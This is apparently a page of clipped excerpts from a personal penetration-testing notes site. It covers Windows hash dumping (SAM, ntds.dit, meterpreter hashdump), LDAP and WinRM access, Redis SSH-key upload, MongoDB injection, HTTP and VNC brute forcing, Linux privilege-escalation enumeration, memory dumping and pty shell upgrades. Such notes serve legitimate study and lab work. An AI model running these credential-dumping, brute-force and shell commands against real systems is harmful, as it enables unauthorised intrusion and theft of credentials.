Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…
It is possible to write as a user arbitrary text into the logs. Messages can be faked which could alert persons/surveillance systems. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
Create a session tmux new -s <name>
Powershell Cmdlets consist out of Verb-Method. To search for a method, type Get-Command New-U* To see all attributes for a Cmdlet, type Get-LocalUser | Get-Member To see specific or non-default attributes, type Get-LocalUser | Select-Object -Property Name,PasswordRequired Examples Directories and files Get all files in the current directory. Get-ChildItem Get all files in the current directory and below.…
Windows Remote Management (WinRM / wsman) is a service which runs on port 5985 and 5986. Evil Winrm Github | Opens a shell for a user root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!' For many users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f…
Basics Authentication sequence for an user to log in on a domain (controller): Authentication sequence for an authenticated user on a local system: Terminology Kerberoasting means an offline cracking of the password in the NTLM hash. Useless if the service runs as service user. Then, the password will be replaced by a 128 character long…
Runs on port 6379 — needs a full nmap scan! If conection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…
Convert a Python2 script into a Python3 script: 2to3 -w example.py Fix tab/space/identation problems: autopep8 -i linuxprivchecker.py If a library is installed, but cannot found from smb.SMBConnection import SMBConnection then try to search the file locally and include the path manually: import syssys.path.append("path/to/your/file") Oneliner for executing bash in a file: echo 'import os;os.system("/bin/bash")' > /tmp/e.py Execute something:…
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
Auf dem Client: root@raspberrypi:/etc/apt# cat apt.conf Acquire::http::Proxy "http://10.10.14.38:3128"; Auf dem Proxy:
Cross-compiling for 32/64 bit systems sudo apt-get install gcc-multlib gcc ‑m32 datei.c Tipp: Add ‑static for a static binary. Note that you need to install packets for the target platform, e.g. apt install gcc-i686-linux-gnu. Cross-compiling for Windows Install the packages like apt install gcc-mingw-w64. Then use x86_64-w64-mingw32-gcc execute.c -o execute.exe. Disable security features You can…
Brute force is possible with nmap: # nmap --script vnc-brute -p 5900 localhost For TightVNC, use vncpwd to break passwords. A password can be obtained via reg query HKLM\Software\TightVNC\Server\ /v Password
1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…
Mit distccd kann man entfernt compilieren.
Tools to detect nmap ‑O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could send back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
Enumeration Mandatory Optional On Windows
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
Afterwards: See Analyzing memory Linux Prozess memory dump Find out which memory segments are used by an application via its PID: cat /proc/<pid>/maps Dump the used memory from an application: (credit) #!/bin/bash grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | while read start stop; do \ gdb --batch --pid $1 -ex \…
https://github.com/Tib3rius/AutoRecon Multi recon tool for broad scanning
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';